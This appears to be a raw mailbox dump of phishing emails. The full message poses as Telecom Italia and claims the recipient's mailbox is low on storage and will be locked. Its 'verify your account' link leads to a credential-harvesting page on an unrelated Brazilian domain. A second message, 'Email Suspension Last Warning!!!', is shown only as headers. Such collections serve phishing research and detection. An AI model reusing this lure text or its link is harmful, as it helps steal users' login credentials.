From: "Account Update" <amministrazione@telecomitalia.it>
Date: Tue, 30 Aug 2016 03:58:58 +0700
X-Antivirus: verificato in 0.049sec su RomagnoliSaxFirewall.local ([192.168.1.200])
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 349

You will not see this in a MIME-aware mail reader.
--===============2116047159==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

  =

 =

    	  =

    	 =

   =

   Verify Your Mailbox 	 =

   	 =

   	 =

   =

   Dear jose@monkey.org,  Your e-mail account is running on a low storage s=
pace, verify your account now to upgrade storage space, other wise your acc=
ount shall be locked out. 	 =

   	 =

   	 =

   Click here to verify your account 	 =

   	 =

   	 =

   	 =

  =20
--===============2116047159==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html>
<head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dutf=
-8"/>
	<title></title>
</head>
<body>
<p><br />
&nbsp;</p>

<table>
	<tbody>
		<tr>
			<td width=3D"30">&nbsp;</td>
			<td>
			<table align=3D"center" cellspacing=3D"0" style=3D"BORDER-TOP: #a4a4a4 2=
px solid; BORDER-RIGHT: #a4a4a4 2px solid; BORDER-BOTTOM: #a4a4a4 2px solid=
; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: #a=
4a4a4 2px solid; PADDING-RIGHT: 0px; -moz-box-shadow: 6px 6px 12px #888; -w=
ebkit-box-shadow: 6px 6px 12px #888; box-shadow: 6px 6px 12px #888; border-=
radius: 6px; -moz-border-radius: 6px" width=3D"500">
				<tbody>
					<tr>
						<td height=3D"40">&nbsp;</td>
					</tr>
					<tr>
						<td>
						<table align=3D"center" width=3D"460">
							<tbody>
								<tr>
									<td><font face=3D"calibri" size=3D"+3">Verify Your Mailbox </font>=
</td>
								</tr>
							</tbody>
						</table>
						</td>
					</tr>
					<tr>
						<td height=3D"20">&nbsp;</td>
					</tr>
					<tr>
						<td>
						<table align=3D"center" width=3D"460">
							<tbody>
								<tr>
									<td><font face=3D"calibri" size=3D"3">Dear jose@monkey.org, </font>
									<div class=3D"yiv2486292201" style=3D"FONT-SIZE: 24px; COLOR: rgb(=
68,68,68); font-stretch: normal;"><span style=3D"font-size:14px;">Your e-ma=
il account is running on a low storage space, verify your account now to up=
grade storage space, other wise your</span><span style=3D"font-size:14px;">=
 account shall be locked out.</span></div>
									</td>
								</tr>
							</tbody>
						</table>
						</td>
					</tr>
					<tr>
						<td height=3D"20">&nbsp;</td>
					</tr>
					<tr>
						<td bgcolor=3D"#585858" height=3D"60">
						<div align=3D"center"><a href=3D"http://produtospersonalizaveis.com.b=
r/js/aw_all/xvz/auth/aut.php?email=3Djose@monkey.org" style=3D"TEXT-DECORAT=
ION: none"><font color=3D"#ffffff" face=3D"verdana"><b>Click here to verify=
 your account</b></font></a></div>
						</td>
					</tr>
					<tr>
						<td height=3D"20">&nbsp;</td>
					</tr>
					<tr>
						<td height=3D"40">&nbsp;</td>
					</tr>
				</tbody>
			</table>
			</td>
		</tr>
	</tbody>
</table>
</body>
</html>
--===============2116047159==--

From jose@monkey.org Wed Aug 31 07:57:38 2016 +0000
Return-Path: MAILER-DAEMON
Delivered-To: jose@monkey.org
X-FDA: 71908432596.10.juice24_257e0aaf6b04c
X-Spam-Summary: 79,5.931,0,7b0b1bdde5c677f4,d41d8cd98f00b204,,:,RULES_HIT:41:72:377:490:494:495:589:800:962:967:973:983:988:989:1189:1208:1221:1254:1260:1261:1263:1313:1314:1381:1397:1431:1433:1434:1435:1436:1516:1517:1518:1533:1535:1543:1571:1575:1588:1589:1592:1594:1685:1711:1714:1730:1768:1779:1792:2069:2070:2198:2199:2525:2543:2560:2563:2682:2685:2827:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3770:3876:3877:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4117:4605:5007:6114:6238:6261:6300:6630:6642:6669:6674:6678:7652:8516:8603:8784:8957:8985:9025:9080:9388:10004:10215:11073:11657:11658:11914:12043:12555:12660:12973:13005:13017:13018:13019:13025:13139:13374:13439:14096:14181:14721:14829:21080:21364:21433:21451:30022:30026:30054,0,RBL:192.166.134.171:@imf24.b.hostedemail.com:.lbl8.mailshell.net-62.16.83.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:hu,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFti
X-HE-Tag: juice24_257e0aaf6b04c
X-Filterd-Recvd-Size: 6096
Received: from mail.majak.ua (mail.majak.ua [192.166.134.171])
	by imf24.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 31 Aug 2016 07:57:37 +0000 (UTC)
Received: from [41.71.190.1] (unknown [41.71.190.1])
	by mail.majak.ua (Postfix) with ESMTPA id F32811C2293D
	for <jose@monkey.org>; Wed, 31 Aug 2016 10:57:25 +0300 (EEST)
Content-Type: multipart/alternative; boundary="===============0041212414=="
MIME-Version: 1.0
Subject: Email Suspension Last Warning!!!
To: jose@monkey.org
